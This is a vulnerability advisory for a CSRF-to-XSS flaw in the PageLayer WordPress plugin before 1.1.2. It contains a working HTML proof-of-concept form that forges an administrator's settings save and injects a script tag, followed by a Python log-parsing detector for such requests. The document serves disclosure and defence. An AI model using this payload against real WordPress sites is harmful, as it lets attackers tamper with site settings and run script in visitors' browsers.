Page Builder: PageLayer - Drag and Drop website builder < 1.1.2 - CSRF leading to XSS



Description
A flaw allowed attackers to forge a request on behalf of a site's administrator that modified the plugin's settings, which could allow malicious JavaScript to be injected.
Proof of Concept
<html>
  <body>
    <form action="http://[site]/wp-admin/admin.php?page=pagelayer" method="POST">
      <input type="hidden" name="pl&#95;support&#95;ept&#91;&#93;" value="post" />
      <input type="hidden" name="pl&#95;support&#95;ept&#91;&#93;" value="page" />
      <input type="hidden" name="pagelayer&#95;content&#95;width" value="" />
      <input type="hidden" name="pagelayer&#95;between&#95;widgets" value="" />
      <input type="hidden" name="pagelayer&#95;body&#95;font" value="" />
      <input type="hidden" name="pagelayer&#95;tablet&#95;breakpoint" value="" />
      <input type="hidden" name="pagelayer&#95;mobile&#95;breakpoint" value="" />
      <input type="hidden" name="pagelayer&#95;icons&#95;set&#91;&#93;" value="font&#45;awesome5" />
      <input type="hidden" name="pagelayer&#45;address" value="&lt;script&gt;alert&#40;0&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="pagelayer&#45;phone" value="&#43;1234567890" />
      <input type="hidden" name="pagelayer&#95;cf&#95;to&#95;email" value="" />
      <input type="hidden" name="submit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
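
A detection check for the request the proof of concept above sends, as an added example that is not part of the original advisory: it reads web-server access logs in combined format and flags POSTs to the plugin's settings URL whose Referer is missing or names another host. The site host `blog.example`, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def is_settings_post(method, target):
    """True for POST .../wp-admin/admin.php?page=pagelayer (the PoC's form action)."""
    url = urlsplit(target)
    return (method == "POST"
            and url.path.endswith("/wp-admin/admin.php")
            and parse_qs(url.query).get("page") == ["pagelayer"])

def classify(line, site_host):
    """None for unrelated lines, else 'same-host', 'cross-host' or 'no-referer'."""
    m = LOG_RE.match(line)
    if not m or not is_settings_post(m["method"], m["target"]):
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        # Absent Referer: referrer policy, privacy tooling or a non-browser client.
        return "no-referer"
    # Compare the parsed hostname; a substring test would accept
    # http://attacker.example/?x=blog.example as the site's own page.
    host = (urlsplit(referer).hostname or "").lower()
    return "same-host" if host == site_host.lower() else "cross-host"

def suspicious(lines, site_host):
    """Settings saves whose Referer is missing or names another host."""
    verdicts = ((classify(line, site_host), line) for line in lines)
    return [(v, line) for v, line in verdicts if v in ("cross-host", "no-referer")]

# Constructed sample lines (reserved .example hosts, documentation IP range).
REQ = '"POST /wp-admin/admin.php?page=pagelayer HTTP/1.1" 200 5120'
STAMP = '203.0.113.10 - - [28/May/2020:10:00:01 +0000]'
SAMPLE = [
    f'{STAMP} {REQ} "http://blog.example/wp-admin/admin.php?page=pagelayer" "Mozilla/5.0"',
    f'{STAMP} {REQ} "http://attacker.example/?x=blog.example" "Mozilla/5.0"',
    f'{STAMP} "GET /wp-admin/admin.php?page=pagelayer HTTP/1.1" 200 4800 "http://blog.example/wp-admin/" "Mozilla/5.0"',
    f'{STAMP} {REQ} "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, line in suspicious(SAMPLE, "blog.example"):
        print(verdict, line)
```

A `no-referer` hit is weaker evidence than a `cross-host` one and is worth correlating with a settings change made at the same time.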

Affects Plugin

References

URL https://www.wordfence.com/blog/2020/05/high-severity-vulnerabilities-in-pagelayer-plugin-affect-over-200000-wordpress-sites/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Views 1277
Verified No
WPVDB ID 10240

Timeline

Publicly Published 2020-05-28 (about 1 month ago)
Added 2020-05-28 (about 1 month ago)
Last Updated 2020-05-29 (about 1 month ago)
